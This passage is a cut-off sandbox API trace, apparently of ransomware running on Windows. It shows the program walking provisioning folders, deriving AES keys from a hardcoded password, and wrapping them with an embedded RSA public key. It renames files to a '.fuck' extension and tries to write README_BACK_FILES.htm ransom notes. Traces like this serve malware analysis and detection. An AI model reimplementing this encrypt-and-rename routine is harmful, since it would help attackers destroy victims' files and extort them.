CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.370] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.370] CryptHashData (hHash=0x28e8638, pbData=0x28cb7b0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.370] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e6ef8) returned 1 [0240.370] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.370] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.370] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f63d0) returned 1 [0240.371] CryptImportPublicKeyInfo (in: hCryptProv=0x28f63d0, dwCertEncodingType=0x1, pInfo=0x28c86f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8728*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8730*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e6bf8) returned 1 [0240.371] CryptEncrypt (in: hKey=0x28e6bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.371] CryptEncrypt (in: hKey=0x28e6bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6788*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f6788*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.371] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6788, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.371] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.371] CryptEncrypt (in: hKey=0x28e6ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.371] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.371] CloseHandle (hObject=0xffffffff) returned 1 [0240.371] CloseHandle (hObject=0xffffffff) returned 1 [0240.371] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.372] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.373] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.gsg")) returned 0 [0240.373] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.fuck")) returned 0 [0240.374] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.374] CryptDestroyKey (hKey=0x28e6ef8) returned 1 [0240.374] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.374] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.374] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.374] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.374] AreFileApisANSI () returned 1 [0240.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.374] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.375] GetLastError () returned 0x5 [0240.375] GetLastError () returned 0x5 [0240.375] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.375] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.375] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\readme_back_files.htm")) returned 0xffffffff [0240.375] AreFileApisANSI () returned 1 [0240.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.375] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.376] GetLastError () returned 0x5 [0240.376] GetLastError () returned 0x5 [0240.376] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.376] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e88b8 [0240.376] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.376] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.376] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.376] GetLastError () returned 0x5 [0240.376] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml")) returned 0x20 [0240.376] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.377] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.377] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.378] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.378] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6348) returned 1 [0240.381] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.381] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.381] CryptHashData (hHash=0x28e84f8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.381] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8578) returned 1 [0240.381] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.381] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.381] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f75e0) returned 1 [0240.382] CryptImportPublicKeyInfo (in: hCryptProv=0x28f75e0, dwCertEncodingType=0x1, pInfo=0x2908748*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2908778*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908780*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e71b8) returned 1 [0240.382] CryptEncrypt (in: hKey=0x28e71b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.382] CryptEncrypt (in: hKey=0x28e71b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7b30*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f7b30*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.382] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7b30, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.382] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.382] CryptEncrypt (in: hKey=0x28e8578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.382] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.382] CloseHandle (hObject=0xffffffff) returned 1 [0240.382] CloseHandle (hObject=0xffffffff) returned 1 [0240.383] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.383] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.383] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.gsg")) returned 0 [0240.384] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.fuck")) returned 0 [0240.384] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0240.384] CryptDestroyKey (hKey=0x28e8578) returned 1 [0240.384] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.385] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.385] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.385] GetLastError () returned 0x5 [0240.385] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml")) returned 0x20 [0240.385] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.386] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.386] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.387] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.387] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6348) returned 1 [0240.389] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.389] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.389] CryptHashData (hHash=0x28e84f8, pbData=0x28cb968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.389] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8638) returned 1 [0240.389] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.389] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.389] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f7aa8) returned 1 [0240.390] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7aa8, dwCertEncodingType=0x1, pInfo=0x29080c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29080f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2908100*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e70b8) returned 1 [0240.390] CryptEncrypt (in: hKey=0x28e70b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.390] CryptEncrypt (in: hKey=0x28e70b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7f70*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f7f70*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.390] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7f70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.390] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.390] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.390] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.390] CloseHandle (hObject=0xffffffff) returned 1 [0240.390] CloseHandle (hObject=0xffffffff) returned 1 [0240.390] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.391] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.391] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.gsg")) returned 0 [0240.391] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.fuck")) returned 0 [0240.392] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0240.392] CryptDestroyKey (hKey=0x28e8638) returned 1 [0240.392] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.392] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.392] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e84f8 [0240.392] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.392] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.392] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e8578 [0240.393] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.393] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.393] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.393] GetLastError () returned 0x5 [0240.393] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.393] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.393] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.394] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all 